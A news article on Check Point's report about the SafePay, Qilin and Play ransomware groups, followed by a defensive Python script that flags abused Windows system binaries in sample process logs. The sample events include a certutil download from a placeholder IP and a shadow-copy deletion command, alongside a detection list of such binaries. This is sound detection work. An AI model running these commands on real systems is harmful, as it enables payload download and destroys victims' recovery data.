
The most prevalent and active ransomware group out there right now is SafePay, a gang first identified a mere seven months ago. According to cybersecurity firm Check Point, the group is possibly tied to Russian-affiliated threat actors.
In a new report, Check Point says SafePay has quickly established itself as a key player in the cybercrime ecosystem.
The group is very active and uses a double-extortion strategy, encrypting files while exfiltrating sensitive data to further pressure victims into paying ransoms.
The group employs aggressive negotiation tactics, including direct phone calls to victims, researchers add, and operates a “shame site” where stolen data from non-paying victims is published.
As per Check Point, SafePay has already listed over 200 victim organizations, with a distinct focus on German targets, which make up nearly one-fifth of its victims. This marks a clear deviation from typical global ransomware targeting trends.
“Notably, SafePay’s malware includes a Cyrillic-language exclusion, suggesting possible ties to Russian-affiliated threat actors,” the cybersecurity company adds.
It seems that the education sector remains a prime target for SafePay and other ransomware groups. However, these sophisticated, multi-stage campaigns also target the government, telecommunications, and healthcare sectors.
At the end of May, Security Affairs reported that North Carolina-based anatomic pathology lab Marlboro-Chesterfield Pathology had information from 236,000 patients compromised following a SafePay ransomware attack in mid-January.
Competing with SafePay is Qilin, a ransomware-as-a-service operation first detected in July 2022 and known for targeting large enterprises and high-value organizations, with a particular focus on the healthcare and education sectors.

Qilin – which is again linked to Russia – admitted in March it was responsible for the February 10th hack of a prestigious cancer treatment center in Japan, exposing the sensitive health information of 300,000 patients and leaving its hospital system “unusable.”
Another group trying to keep up is Play Ransomware, also referred to as PlayCrypt. This group has targeted a broad spectrum of businesses and critical infrastructure across North America, South America, and Europe, affecting approximately 300 entities by October 2023, Check Point says.
The report explains that Play Ransomware typically gains access to networks through compromised valid accounts or by exploiting unpatched vulnerabilities, such as those in Fortinet SSL VPNs.
Once inside, it employs techniques like using living-off-the-land binaries for tasks such as data exfiltration and credential theft.
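The living-off-the-land pattern described above is mainly a detection problem for defenders, because the binaries involved are legitimate Windows components. The following script, added here as an illustration and not code from Check Point's report or from any of the groups discussed, scans constructed Sysmon-style process-creation events and flags executions of a small, assumed set of commonly abused system binaries, raising severity when the command line carries arguments associated with download, exfiltration staging, or recovery inhibition. The binary list, the argument fragments, and the sample events are all constructed for this example.

```python
import json
import ntpath
from typing import Dict, List, Optional

# Living-off-the-land binaries and the task a defender would map each one to.
# This mapping is an assumption made for the example, not a list from the report.
LOLBIN_TASKS: Dict[str, str] = {
    "certutil.exe": "download / staging for exfiltration",
    "bitsadmin.exe": "download / staging for exfiltration",
    "rundll32.exe": "proxy execution of DLL code",
    "ntdsutil.exe": "credential access (AD database export)",
    "vssadmin.exe": "shadow copy manipulation (recovery inhibition)",
}

# Command-line fragments that raise a LOLBin execution from "medium" to "high".
# Also constructed for this example; a real rule set would be far larger.
HIGH_SEVERITY_ARGS = ("urlcache", "/transfer", "ifm", "delete shadows")

# Constructed process-creation events in a Sysmon-like JSON shape (not real telemetry).
SAMPLE_EVENTS = "\n".join([
    json.dumps({"ts": "2025-06-01T02:14:09Z", "host": "WS-042", "user": "CORP\\jdoe",
                "image": "C:\\Windows\\System32\\certutil.exe",
                "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/s.txt s.txt"}),
    json.dumps({"ts": "2025-06-01T02:15:30Z", "host": "WS-042", "user": "CORP\\jdoe",
                "image": "C:\\Windows\\System32\\rundll32.exe",
                "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"}),
    json.dumps({"ts": "2025-06-01T02:20:11Z", "host": "SRV-01", "user": "CORP\\svc_backup",
                "image": "C:\\Windows\\System32\\vssadmin.exe",
                "cmdline": "vssadmin.exe delete shadows /all /quiet"}),
    json.dumps({"ts": "2025-06-01T02:21:00Z", "host": "WS-042", "user": "CORP\\jdoe",
                "image": "C:\\Windows\\System32\\notepad.exe",
                "cmdline": "notepad.exe notes.txt"}),
])


def parse_events(raw: str) -> List[dict]:
    """Parse newline-delimited JSON events, skipping blank or malformed lines."""
    events = []
    for line in raw.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # malformed telemetry must not abort the whole scan
    return events


def classify(event: dict) -> Optional[dict]:
    """Return a finding for one event, or None when it is not a watched binary."""
    # ntpath handles Windows paths correctly even when this runs on Linux.
    name = ntpath.basename(event.get("image", "")).lower()
    task = LOLBIN_TASKS.get(name)
    if task is None:
        return None
    cmdline = event.get("cmdline", "")
    lowered = cmdline.lower()
    severity = "high" if any(frag in lowered for frag in HIGH_SEVERITY_ARGS) else "medium"
    return {
        "ts": event.get("ts"), "host": event.get("host"), "user": event.get("user"),
        "binary": name, "task": task, "severity": severity, "cmdline": cmdline,
    }


def scan(raw: str) -> List[dict]:
    """Run the classifier over every event and keep only the findings."""
    return [f for f in map(classify, parse_events(raw)) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding['severity']:6}] {finding['ts']} {finding['host']} {finding['user']} "
              f"{finding['binary']} -> {finding['task']}: {finding['cmdline']}")
```

On the sample input the script reports the certutil and vssadmin executions as high severity and the rundll32 call as medium, while the notepad launch is ignored. A "medium" hit on its own is expected to be noisy; in practice it is the combination with a valid-account logon from an unusual location or a VPN appliance session that turns it into something worth an analyst's time.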